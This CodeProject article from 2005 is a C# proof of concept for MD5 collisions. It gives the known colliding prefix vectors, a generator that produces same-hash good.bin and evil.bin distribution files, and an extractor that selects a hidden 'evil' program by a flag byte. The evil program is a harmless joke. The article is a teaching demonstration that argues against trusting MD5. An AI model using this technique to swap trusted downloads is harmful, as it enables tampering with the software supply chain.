Click here to Skip to main content
Click here to Skip to main content

Exploiting MD5 collisions (in C#)

, 20 Sep 2005
Rate this:
Please Sign up or sign in to vote.
This article shows how the MD5 collisions can be used to tamper software distribution schemas.

Introduction

In my previous article Good Bye MD5, I introduced you to the current findings on cryptology and MD5 collision detection. A debate started, and most of the people think that these findings are not a serious issue.

Microsoft agreed that this is an important issue:

"Microsoft is banning certain cryptographic functions from new computer code, citing increasingly sophisticated attacks that make them less secure, according to a company executive".

"The Redmond, Wash., software company instituted a new policy for all developers that bans functions using the DES, MD4, MD5 and, in some cases, the SHA1 encryption algorithm, which is becoming "creaky at the edges," said Michael Howard, senior security program manager at the company, Howard said". Source: Microsoft Scraps Old Encryption in New Code

We now have some proofs of concept, like a pair of X.509 colliding certificates and a spectacular example of a pair of postscript documents, with the same MD5 hash value, you can read about this in the excellent paper, Attacking Hash Functions by Poisoned Messages "The Story of Alice and her Boss".

How to exploit the collisions

There is a known result about MD5 hash function:

If MD5(x) == MD5(y) then MD5(x+q) == MD5(y+q)

So, if you have a pair of messages, x and y, with the same MD5 value, you can append a payload q, the MD5 value remains the same, the size of q is arbitrary. You need a pair of vectors, x and y to do the exploit. You can try to find a pair for yourself, but we already have a pair of values, given by the Chinese investigators Joux and Wang. A practical use of this pair of vector values is explained in the paper MD5 To Be Considered Harmful Someday, by Dan Kaminsky.

In my blog, I have written about these issues, and now I want to show you how you can make an exploit using these vectors.

Hacking software distribution

The proof of concept to be shown in this article has the following scenario:

  • This is a simulated software distribution mechanism.
  • The software is distributed in binary format, in files with .bin extension.
  • Exists as an extraction program that checks and extracts the software from the .bin file.
  • For verification purpose, we use the MD5 value to check the integrity of the .bin files.

This picture shows a scenario, where a pair of binary files with the same MD5 are generated, MD5(good.bin) == MD5(evil.bin):

Attacking the distribution software

First, we will build a generator program, this program takes a pair of executables, the first is a harmless program and the second the evil file, is a harmful program, and generates a pair of binary distribution files (.bin files). These are good.bin distribution file, and an evil.bin distribution file.

The good program

The code of the harmless program is simple:

namespace GoodExe
{
 /// <summary>
 /// A Harmless program
 /// </summary>
 class Class1
 {
  /// <summary>
  /// The main entry point for the application.
  /// </summary>
  [STAThread]
  static void Main(string[] args)
  {
   Console.WriteLine ("this is a good executable");
  }
 }
}

The evil program

This is the code of the evil program, that simulates a harmful behavior:

using System;
using System.Threading;
 
namespace EvilExe
{
  /// <summary>
  /// A harmfull program
  /// </summary>
  class Class1
  {
    /// <summary>
    /// The main entry point for the application.
    /// </summary>
    [STAThread]
    static void Main(string[] args)
    {
      Console.WriteLine ("This is an evil file");
      Console.WriteLine ("Formatting your hard drive...");
      Thread.Sleep(2000);
      Console.WriteLine ("Just joking...");
    }
  }
}

The collision generator

We have a pair of vectors with the same MD5 value:

/// <summary>
/// First prefix vector
/// Taken from stripwire by Dan Kaminsky
/// <A href="http://www.doxpara.com/md5_someday.pdf">http://www.doxpara.com/md5_someday.pdf</A>
/// </summary>
static byte[] vec1 = 
{
   0xd1, 0x31, 0xdd, 0x02, 0xc5, 0xe6 
   , 0xee , 0xc4 , 0x69 , 0x3d, 0x9a , 0x06 
   , 0x98 , 0xaf , 0xf9 , 0x5c , 0x2f , 0xca 
   , 0xb5 , /**/0x87 , 0x12 , 0x46 , 0x7e 
   , 0xab , 0x40 , 0x04 , 0x58 , 0x3e , 0xb8 
   , 0xfb , 0x7f , 0x89 , 0x55 , 0xad 
   , 0x34 , 0x06 , 0x09 , 0xf4 , 0xb3 , 0x02 
   , 0x83 , 0xe4 , 0x88 , 0x83 , 0x25 
   , 0x71 , 0x41 , 0x5a, 0x08 , 0x51 , 0x25 
   , 0xe8 , 0xf7 , 0xcd , 0xc9 , 0x9f , 
   0xd9 , 0x1d , 0xbd , 0xf2 , 0x80 , 0x37 
   , 0x3c , 0x5b , 0xd8 , 0x82 , 0x3e 
   , 0x31 , 0x56 , 0x34 , 0x8f , 0x5b , 0xae 
   , 0x6d , 0xac , 0xd4 , 0x36 , 0xc9 
   , 0x19 , 0xc6 , 0xdd , 0x53 , 0xe2 , 0xb4 
   , 0x87 , 0xda , 0x03 , 0xfd , 0x02 
   , 0x39 , 0x63 , 0x06 , 0xd2 , 0x48 , 0xcd 
   , 0xa0 , 0xe9 , 0x9f , 0x33 , 0x42 
   , 0x0f , 0x57 , 0x7e , 0xe8 , 0xce , 0x54 
   , 0xb6 , 0x70 , 0x80 , 0xa8 , 0x0d 
   , 0x1e , 0xc6 , 0x98 , 0x21 , 0xbc , 0xb6 
   , 0xa8 , 0x83 , 0x93 , 0x96 , 0xf9 
   , 0x65 , 0x2b , 0x6f , 0xf7 , 0x2a , 0x70
};
/// <summary>
/// Second prefix vector
/// Taken from stripwire by Dan Kaminsky
/// <A href="http://www.doxpara.com/md5_someday.pdf">http://www.doxpara.com/md5_someday.pdf</A>
/// </summary>
static byte[] vec2 = 
{
   0xd1 , 0x31, 0xdd , 0x02 , 0xc5 , 0xe6 
   , 0xee , 0xc4 , 0x69 , 0x3d , 0x9a , 0x06 
   , 0x98 , 0xaf , 0xf9 , 0x5c, 0x2f , 0xca 
   , 0xb5 , /**/0x07 , 0x12 , 0x46 , 0x7e 
   , 0xab , 0x40 , 0x04 , 0x58 , 0x3e , 0xb8 
   , 0xfb , 0x7f , 0x89 , 0x55 , 0xad 
   , 0x34 , 0x06 , 0x09 , 0xf4 , 0xb3 , 0x02 
   , 0x83 , 0xe4 , 0x88 , 0x83 , 0x25 
   ,/**/ 0xf1 , 0x41 , 0x5a , 0x08 , 0x51 , 0x25 
   , 0xe8 , 0xf7 , 0xcd , 0xc9 , 0x9f
   , 0xd9 , 0x1d , 0xbd , /**/0x72 , 0x80 
   , 0x37 , 0x3c , 0x5b, 0xd8 , 0x82 
   , 0x3e , 0x31 , 0x56 , 0x34 , 0x8f , 0x5b 
   , 0xae , 0x6d , 0xac , 0xd4 , 0x36 
   , 0xc9 , 0x19 , 0xc6 , 0xdd , 0x53 , 0xe2 
   , /**/0x34 , 0x87 , 0xda , 0x03 , 0xfd 
   , 0x02 , 0x39 , 0x63 , 0x06 , 0xd2 , 0x48 
   , 0xcd , 0xa0, 0xe9 , 0x9f , 0x33 
   , 0x42 , 0x0f , 0x57 , 0x7e , 0xe8 , 0xce 
   , 0x54 , 0xb6 , 0x70 , 0x80 , /**/ 0x28 
   , 0x0d , 0x1e, 0xc6 , 0x98 , 0x21 , 0xbc 
   , 0xb6 , 0xa8 , 0x83 , 0x93 , 0x96 
   , 0xf9 , 0x65 , /* flag byte*/0xab 
   , 0x6f , 0xf7 , 0x2a , 0x70
};

Remember that given this pair of vectors, if we have a payload of any size, then MD5(vec1+payload) == MD5(vec2+payload). The payload is built in this way, the length of good file, the length of evil file, the content of the good file, and the content of the evil file.

The core of the generation program is shown below:

[STAThread]
static void Main(string[] args)
{
   if (args.Length != 2)
    Usage();

 
   byte[] goodFile = ReadBinaryFile(args[0]);
   byte[] evilFile = ReadBinaryFile(args[1]);
   
   WriteBinary("good.bin", vec1, goodFile, evilFile);
   WriteBinary("evil.bin", vec2, goodFile, evilFile);
   
   ShowMD5("good.bin");
   ShowMD5("evil.bin");
}
   
private static void Usage ()
{
   Console.WriteLine("Usage: md5gen good_file evil_file");
   Environment.Exit (-1);
}

 
private static void WriteBinary (string sOutFileName, 
          byte[] prefix, byte[] goodFile, byte[] evilFile)
{
   using (FileStream fs = File.OpenWrite (sOutFileName))
   {
      using (BinaryWriter writer = new BinaryWriter(fs))
      {
         writer.Write(prefix);
         writer.Write ( goodFile.Length );
         writer.Write ( evilFile.Length );
         fs.Write (goodFile, 0, goodFile.Length);
         fs.Write (evilFile, 0, evilFile.Length);
         fs.Close ();
      }
   }
}

If we apply the generator program to the pair of programs, we generate a pair of files, good.bin and evil.bin in the following way:

C:\TEMP>md5clone goodexe.exe evilexe.exe
MD5 Hash for good.bin is 1D8EE13FBA00DD022F002AAD0E3EF9C7
MD5 Hash for evil.bin is 1D8EE13FBA00DD022F002AAD0E3EF9C7

Now, we can publish good.bin in the Internet for people to download it, and later, we can replace it with evil.bin. Now, the users will get infected, without noticing and convinced that there is no tampering, because the MD5 signature is the same for both files, in others words we have MD5(good.bin) == MD5(evil.bin).

The extractor program

Now, suppose we have changed the extractor program, with our own version. Our extractor receives the .bin distribution file, and extracts the good or evil program based on the prefix vector at the beginning of the .bin file. We use the byte at position 123 to detect the vector that is used for the prefix.

The code of the extractor is very simple:

  [STAThread]
  static void Main(string[] args)
  {
    if (args.Length == 0)
     Usage();
    ExtractFile(args[0], args[1]);
  }

 
  private static void ExtractFile (string sfilename, 
                                      string soutputfile)
  {
    using (BinaryReader reader = 
            new BinaryReader(File.OpenRead (sfilename)))
    {
      byte[] vec = reader.ReadBytes (128);
      int goodSize = reader.ReadInt32 ();
      int evilSize  = reader.ReadInt32 ();
      /// open evil file
      if (vec[123] == 0xab)
      {
        reader.ReadBytes (goodSize);
        byte[] evil = reader.ReadBytes (evilSize);
        using (BinaryWriter writer = 
              new BinaryWriter(File.OpenWrite (soutputfile)))
        {
           writer.Write (evil);
           writer.Close (); 
        }
      }
      else
      {
        byte[] good = reader.ReadBytes (goodSize);
        using (BinaryWriter writer = 
            new BinaryWriter(File.OpenWrite (soutputfile)))
        {
           writer.Write (good);
           writer.Close ();
        }
      }
      Console.WriteLine ("File written on {0}", 
                                       soutputfile);
    }
  }

 
  private static void Usage ()
  {
     Console.WriteLine(
        "Usage: md5extract file.bin output_file.exe");
     Environment.Exit (-1);
  }

Suppose, you receive the good.bin file, then you apply the extractor on good.bin and the good.exe file is extracted. But if you receive the evil.bin file, then the extractor will extract the evil.exe, i.e. the harmful executable. Remember that MD5(evil.bin) == MD5(good.bin).

Conclusion

Recently, the world of cryptographic hash functions was on crisis. A lot of researchers announced "attacks" to find collisions for common hash functions such as MD5 and SHA-1. "For cryptographers, these results are exciting - but many so-called "practitioners" turned them down as practically irrelevant".

I hope, this proof of concept will convince you that there is a serious issue with MD5.

"There have already been a few exploits of the collision-finding attacks against MD5: Kaminski [Ka] and Mikle [Mi] presented different executables with the same MD5 hash. One of Kaminski's executables was quite harmless, the other one very harmful. Mikle's executables were self-extracting archives, extracting different stuffs. Lenstra, Wang and de Weger [LWdW,LdW] constructed colliding X.509 certificates".

This article shows how a failure on the software distribution chain, allows exploiting the current findings on cryptology about the MD5 hash function.

History

  • September 20th, 2005: Some grammar correction, and title modified.

License

This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.

A list of licenses authors might use can be found here

Share

About the Author

ediazc
Web Developer
Chile Chile
Eduardo Diaz
personal blog

Comments and Discussions

 
QuestionWhat would be *really* useful ... PinmemberCDGuru23-Sep-05 6:06 
would be a tool which creates all of the possible "candidate" files from an MD5 value. So, let's say you had the MD5 value of an executable. With this tool you could produce all of the possible original files which result in this MD5 hash value. Most of them will not be well-formed executables, so they could be quickly filtered out.
 
The remaining files could be further filtered if you had some idea of the size of the original file. Other filtering techniques could be applied to still further reduce the number of possible files.
 
The end result - possibly after considerable computation time - would be a few files and one of them would be the original executable. Right?
 
Do not be misled into thinking that this would be some magic that produces the one true file. There would be a significant number of candidates dispite whatever filtering was applied. MD5 is a hash function where multiple sources resolve to the same hash value.
 
Obviously, there is a brute-force way of doing this, but that would be a rather crude approach. It would seem there would be a mathematical approach that would be significantly better than brute force.
 
Now that would be really useful.

General General    News News    Suggestion Suggestion    Question Question    Bug Bug    Answer Answer    Joke Joke    Rant Rant    Admin Admin   

Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.

| Advertise | Privacy | Terms of Use | Mobile
Web01 | 2.8.141216.1 | Last Updated 20 Sep 2005
Article Copyright 2005 by ediazc
Everything else Copyright © CodeProject, 1999-2014
Layout: fixed | fluid